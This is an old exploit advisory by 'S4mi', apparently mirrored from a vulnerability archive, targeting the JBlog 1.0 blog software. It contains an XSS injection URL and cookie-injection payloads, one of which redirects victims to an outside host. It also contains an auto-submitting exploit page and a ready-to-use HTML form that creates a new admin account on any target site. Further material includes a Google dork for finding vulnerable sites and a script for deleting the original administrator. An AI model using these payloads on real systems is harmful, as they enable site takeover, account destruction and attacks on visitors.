Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:17568
HistoryJul 22, 2007 - 12:00 a.m.

JBlog 1.0 Creat Admin exploit, xss, Cookie Manipulation

2007-07-2200:00:00
vulners.com
158

<!–
##############################################################################

Script…: JBlog version: 1.0

Script Site…: http://www.jmuller.net/jblog

Vulnerability…: Creat Admin exploit, xss, Cookie Manipulation

Access…: Remote

level…: Dangerous

Author…: S4mi

Contact…: S4mi[at]LinuxMail.org

##############################################################################

cookies Manipulation + Cross Site Scripting :

xss:

http://site.com/jblog/index.php?id=&quot;&gt;[xss Here]&pcomm=com

cookies Manipulation:

The POST variable 'search' in /jblog/recherche.php also The Cookie variable 'theme' is affected and can be set to :

<meta http-equiv='Set-cookie' content='name=value'>

also we can do this :

<meta http-equiv='Set-cookie' content='theme=<body+onload=alert("owned_by_Hacker")>'>

or :

<meta http-equiv='Set-cookie' content='theme=<body+onload=document.location="http://Bad.site.com/&quot;&gt;&#39;&gt;

This is a small exemple of Inject Cookie Xploit (Cookie Manipulation)

<html>
<head>
<title>Inject Cookie Xploit By S4mi</title>
</head>
<body>
<script language="JavaScript">
function JBlogxpl()
{
document.xploit.action=document.xploit.victim.value;
document.xploit.submit();
}
</script>
<form name="xploit" method="post" action="">
<input type="hidden" name="victim" value="http://victim/jblog/recherche.php&quot;&gt;
<input type="hidden" name="search" value="&lt;meta http-equiv='Set-cookie' content='theme=&lt;body+onload=document.location=&quot;http://milw0rm.com/&amp;quot;&amp;gt;&#39;&amp;gt;&quot; />
<script>document.location="javascript: JBlogxpl()"</script>
</form>
</body>
</html>

============================================================================

Remote Privilege Escalation "Creat New Admin Xploit" By S4mi :

–>

<html>
<title>JBlog 1.0 – Remote Privilege Escalation (Creat admin sploit) – By S4mi</title>
<body>
<script language="JavaScript">
function JBlogxpl() {
if (document.xploit.victim.value=="") {
alert("Please enter target!");
return false;
}
{
xploit.action="http://"+document.xploit.victim.value+"admin/ajoutaut.php";
xploit.mot.value=document.xploit.mot.value;
xploit.droit.value=document.xploit.droit.value;
xploit.submit();
}
}

</script>
<strong><p>
-------------------------------------------------------------------------------------------<br>
#JBlog 1.0 – Remote Privilege Escalation Xploit (add user)<br>

Discovered By…: S4mi <br>

Contact…: S4mi[at]LinuxMail.org<br>

#<br>

Google Dork : "propulsй par JBlog" <br>

--------------------------------------------------------------------------------------------</p>
<form name="xploit" method="POST" onSubmit="JBlogxpl();">
Target -> Http://
<input type="text" name="victim" value="www.Site.com/Path/" size="44">
<p> Username…->
<input type="text" name="mot" value="ZaZ" size="30">
(your password will be by default: <i>"admin"</i>)</p>
<p> User type…->
<select name="droit">
<option value="3">Admin</option>
<option value="2">Moderator</option>
<option value="1">Editor</option>
</select>
</p>
<p>Submit…->
<input name="submit" type="submit" value=" Xploit it ">
</p>
</form>
<br>---------------------------------------------------------------------------------------<br>
#NB : Remember do not use a probably existing username (such as "admin"). <br>
#If you want to Delete real admin account :D login into your New Created admin account & use this :<br>
--------------------------------------------------------------------------------------------<p>
<script language="JavaScript">

function AdminDelete()
{ if (document.xploit.victim.value=="") {
alert("Please enter target!");
return false;
}
if(confirm('Are you Sure!! want really DELETE user ?'))
document.location.href="http://"+document.xploit.victim.value+"admin/supauteur.php?cat="+document.userdel.id.value;
}
</script>
<form name="userdel" method="POST" onSubmit="">
ID…> <input type="text" name="id" value="1" size="3">
</form>
<a href="#" OnClick="AdminDelete()"/>Delete</a>

<br>-----------------------------------------------------------------------------------------------<br>
#Special Greetz to : Simo64, DrackaNz, Coder212, Iss4m, HarDose, r0_0t, ddx39, Black-Code, Nuck3r… & all who know Me!

</body>
</html>